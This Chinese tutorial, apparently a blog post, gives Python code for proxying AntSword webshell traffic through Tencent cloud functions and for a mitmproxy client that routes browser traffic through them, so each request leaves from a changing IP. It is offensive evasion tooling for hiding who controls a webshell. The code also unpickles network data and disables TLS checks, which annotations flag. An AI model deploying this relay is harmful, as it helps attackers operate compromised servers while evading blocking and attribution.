云函数代理蚁剑流量
1.创建云函数
#!/usr/bin/env
# -*- coding:utf-8 -*-
import requests
import json
from urllib.parse import urlsplit
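def geturl(urlstr):
    """Return the ``url`` entry of the parsed query-string mapping.

    Args:
        urlstr: Mapping of query-string parameters; ``main_handler`` passes
            ``event['queryString']`` here.

    Returns:
        The value stored under the ``'url'`` key.

    Raises:
        KeyError: If the mapping has no ``'url'`` entry.
    """
    # The original serialised the mapping to JSON and parsed it straight back,
    # which only reproduces an equal mapping; index the input directly.
    # NOTE(review): the value is caller-controlled and is not validated here
    # (scheme, host, address range); main_handler uses it as the outbound URL.
    return urlstr['url']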
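def main_handler(event, context):
    """Relay the body of a gateway request to the URL named in ``?url=``.

    Args:
        event: Gateway event; ``queryString``, ``body`` and ``headers`` are read.
        context: Runtime context supplied by the platform (unused).

    Returns:
        A gateway response dict whose body is the upstream response text.
        ``statusCode`` is always 200, whatever status the upstream returned.
    """
    # NOTE(review): nothing in this handler authenticates the caller or
    # restricts the destination, so anyone who learns the gateway URL can make
    # the function POST to an arbitrary address (open relay / SSRF exposure).
    url = geturl(event['queryString'])
    host = urlsplit(url).netloc
    postdata = event['body']
    # The caller's headers are forwarded as received (the event dict is
    # mutated in place); only a HOST entry is set to the destination host.
    headers = event['headers']
    headers["HOST"] = host
    # NOTE(review): verify=False disables TLS certificate validation, so the
    # identity of the upstream server is never checked and the relayed traffic
    # can be read or altered by an on-path party.
    resp = requests.post(url, data=postdata, headers=headers, verify=False)
    # The listing had lost the `+` joining the two strings (a syntax error).
    # apparent_encoding can be None when no encoding is detected; fall back to
    # utf-8 instead of raising TypeError on the concatenation.
    charset = resp.apparent_encoding or 'utf-8'
    response = {
        "isBase64Encoded": False,
        "statusCode": 200,
        "headers": {'Content-Type': 'text/html;charset=' + charset},
        "body": resp.text
    }
    return response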
使用时在webshell前加api访问路径。
https://service-ncowiper-xxxxxxx.apigw.tencentcs.com/release/helloworld-1637410382?url=https://www.baidu.com/shell.php
云函数HTTP代理
# -*- coding: utf8 -*-
import json
import pickle
from base64 import b64decode, b64encode
import requests
# Shared secret that main_handler compares with the `scf-token` request header.
# NOTE(review): the value is hard-coded and published with this listing, so it
# protects nothing until it is replaced by a freshly generated secret that is
# kept out of the source (for example a function environment variable).
SCF_TOKEN = "INYZCKWDRHLGAFBQEXPTSMVUO"
def authorization():
    """Build the gateway response returned when the SCF-Token check fails.

    Returns:
        A response dict with status 401, no headers and a plain-text body
        asking for a correct token.
    """
    rejection = dict(
        isBase64Encoded=False,
        statusCode=401,
        headers={},
        body="Please provide correct SCF-Token",
    )
    return rejection
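def main_handler(event: dict, context: dict):
    """Check the caller's token, replay the described request, return it pickled.

    Args:
        event: Gateway event. ``headers['scf-token']`` must equal ``SCF_TOKEN``;
            ``body`` is a JSON object of ``requests.request`` keyword arguments
            whose ``data`` entry is base64-encoded.
        context: Runtime context supplied by the platform (unused).

    Returns:
        The 401 response from ``authorization()`` when the token is missing or
        wrong; otherwise a status-200 response whose body is the base64 text of
        the pickled ``requests`` response object.
    """
    # Function-scope import so this block does not depend on the file header.
    import hmac

    # Tencent cloud has its own authorization system https://console.cloud.tencent.com/cam/capi
    # But it may be a little overqualified for a simple usage like this
    try:
        token = event["headers"]["scf-token"]
    except KeyError:
        return authorization()

    # Compare in constant time so response timing does not reveal how much of
    # a guessed token matched. Both sides are encoded to bytes because
    # compare_digest rejects non-ASCII str arguments.
    if not isinstance(token, str) or not hmac.compare_digest(
        token.encode("utf-8", "surrogatepass"),
        SCF_TOKEN.encode("utf-8", "surrogatepass"),
    ):
        return authorization()

    data = event["body"]
    kwargs = json.loads(data)
    kwargs['data'] = b64decode(kwargs['data'])
    # NOTE(review): every key of the caller's JSON becomes a keyword argument
    # of requests.request. Keys are not restricted to the ones the client
    # sends, and a key named `verify` or `allow_redirects` collides with the
    # fixed arguments below and raises TypeError.
    # Prohibit automatic redirect to avoid network errors such as connection reset
    # NOTE(review): verify=False disables TLS certificate validation for the
    # outbound request, so the upstream server's identity is never checked.
    r = requests.request(**kwargs, verify=False, allow_redirects=False)

    # TODO: REFACTOR NEEDED. Return response headers and body directly.
    # There are many errors occurred when setting headers to r.headers with some adjustments(https://cloud.tencent.com/document/product/583/12513).
    # and the response `r.content`/`r.raw.read()` to body.(like gzip error)
    # NOTE(review): returning a pickle forces the consumer to unpickle bytes
    # received over the network, which executes whatever the producer of those
    # bytes chose. A data-only format (status, headers, base64 body as JSON)
    # would avoid that; it needs a matching change on the consuming side.
    serialized_resp = pickle.dumps(r)
    return {
        "isBase64Encoded": False,
        "statusCode": 200,
        "headers": {},
        "body": b64encode(serialized_resp).decode("utf-8"),
    }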
本地安装 mitmproxy
pip3 install mitmproxy
import json
import pickle
from typing import List
from random import choice
from urllib.parse import urlparse
from base64 import b64encode, b64decode
import mitmproxy
from mitmproxy.net.http import Headers
# API gateway URL(s) of the deployed cloud function; several may be listed, separated by commas
scf_servers: List[str] = ['https://service-xxxx.apigw.tencentcs.com/release/helloworld-1637412674']
# Authorization token; must match the token configured in the cloud function
# NOTE(review): hard-coded and identical to the value published with the
# function listing; it only restricts access once replaced by a private,
# freshly generated secret on both sides.
SCF_TOKEN = "INYZCKWDRHLGAFBQEXPTSMVUO"
def request(flow: mitmproxy.http.HTTPFlow):
    """mitmproxy request hook: wrap the intercepted request in a POST to a cloud function.

    The original method, URL, headers, cookies, query parameters and the
    base64-encoded raw body are serialised to JSON and become the content of a
    new POST request addressed to one entry of ``scf_servers``, picked at
    random. ``flow.request`` is replaced with that POST.

    Args:
        flow: The intercepted flow; its ``request`` attribute is read and then
            overwritten.
    """
    original = flow.request
    target = choice(scf_servers)

    # Everything the browser sent, including cookies and any credentials in
    # the headers, is put in the JSON body and is therefore readable by the
    # cloud function endpoint that receives it.
    payload = {
        "method": original.method,
        "url": original.pretty_url,
        "headers": dict(original.headers),
        "cookies": dict(original.cookies),
        "params": dict(original.query),
        "data": b64encode(original.raw_content).decode("ascii"),
    }

    # Fixed headers for the wrapper request; SCF-Token carries the shared
    # secret that the function checks.
    # NOTE(review): "application/xhtml xml" looks like "application/xhtml+xml"
    # with the "+" lost in the listing; kept as printed, confirm against the
    # original script.
    wrapper_headers = {
        "Accept": "text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate, compress",
        "Accept-Language": "en-us;q=0.8",
        "Cache-Control": "max-age=0",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
        "Connection": "close",
        "Host": urlparse(target).netloc,
        "SCF-Token": SCF_TOKEN,
    }

    flow.request = flow.request.make(
        "POST",
        url=target,
        content=json.dumps(payload),
        headers=wrapper_headers,
    )
def response(flow: mitmproxy.http.HTTPFlow):
    """mitmproxy response hook: unwrap the cloud function's reply.

    Any status other than 200 is logged as a warning. A 401 reply only gets
    its headers replaced with an HTML content type; a 433 reply also gets an
    HTML body saying the function's maximum execution time was exceeded and
    that the timeout can be raised in the function configuration. A 200 reply
    is base64-decoded and unpickled, and the flow's response is rebuilt from
    the status code, headers and content of the unpickled object.

    Args:
        flow: The flow whose ``response`` is inspected and possibly replaced.
    """
    status = flow.response.status_code

    if status != 200:
        mitmproxy.ctx.log.warn("Error")

    if status == 401:
        # Token rejected by the function: body is left as received.
        flow.response.headers = Headers(content_type="text/html;charset=utf-8")
        return

    if status == 433:
        flow.response.headers = Headers(content_type="text/html;charset=utf-8")
        flow.response.text = "<html><body>操作已超过云函数服务最大时间限制,可在函数配置中修改执行超时时间</body></html>"
        return

    if status != 200:
        # Other error statuses are passed through unchanged.
        return

    encoded = flow.response.content.decode("utf-8")
    # NOTE(review): pickle.loads executes code embedded in its input. These
    # bytes come from the HTTP response of the configured endpoint, so a
    # compromised, spoofed or mistyped endpoint gets code execution in this
    # mitmproxy process. Nothing here checks the origin or type of the data
    # before it is unpickled; a data-only wire format (for example JSON with
    # status, headers and a base64 body) on both ends would remove the risk.
    upstream = pickle.loads(b64decode(encoded))

    flow.response = flow.response.make(
        status_code=upstream.status_code,
        headers=dict(upstream.headers),
        content=upstream.content,
    )
启动客户端
mitmdump -s client.py -p 8080
修改浏览器代理
添加mitmdump证书(浏览器信任该CA后,本地代理即可解密该浏览器的全部HTTPS流量,建议只在专用的浏览器配置中导入,不用时移除)
选择证书并导入。然后查看IP,每次刷新IP都会变化。